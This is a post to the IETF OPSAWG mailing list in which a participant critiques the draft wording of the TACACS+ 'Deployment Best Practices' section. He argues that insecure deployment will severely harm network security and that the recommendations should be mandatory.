On Jul 13, 2018, at 1:00 AM, Douglas Gash (dcmgash) <[email protected]> wrote: > 9.5 Deployment Best Practices > > With respect to the observations about the security issues described above, a > network administrator MUST NOT rely on the obfuscation of the TACACS+ > protocol and TACACS+ MUST be deployed over networks which ensure privacy and > integrity of the communication. TACACS+ MUST be used within a secure > deployment. Failure to do so may impact overall network security.
"may"? It's much stronger than that. Secrets will leak, people will be able to spoof credentials, etc. It *will* impact network security. Severely. > The following recommendations are not part of the definition of the protocol. > Rather, they impose restrictions on how the protocol is applied. Specific > requirements of the TACACS+ server and TACACS+ client implementations are > mandated to make it easier for the administrators who deploy TACACS+ to adopt > the restrictions. That last sentence is unclear to me. And mandates don't make it easier, they make it harder. But the mandates are necessary for security. > Some of the specific requirements mandated for TACACS+ servers and TACACS+ > clients may not be present in currently deployed implementations. This is > accepted as situational fact, and these implementations may still be regarded > as correctly implementing the TACACS+ protocol as long as they conform to the > details in other sections of this document. The spec doesn't need to say "yes, all existing implementations are OK". This list has had long discussions on that topic, which I suspect was due to general unfamiliarity with the IETF process. I don't think it's necessary to put that statement in the document. There have been many, many, historical protocols documented in the IETF. None that I recall have a statement explicitly blessing existing implementations. The document *should* say that it documents TACACS+ as per existing implementation and practice. BUT for security reasons, certain parts of the protocol and/or deployment practices are deprecated for security reasons. > New implementations, and upgrades of current implementations, SHOULD > implement the recommendations. And that SHOULD means "you don't really need to adopt the recommendations". The spec needs to say "you MUST implement and deploy it in a secure manner". Alan DeKok. _______________________________________________ OPSAWG mailing list [email protected] https://www.ietf.org/mailman/listinfo/opsawg
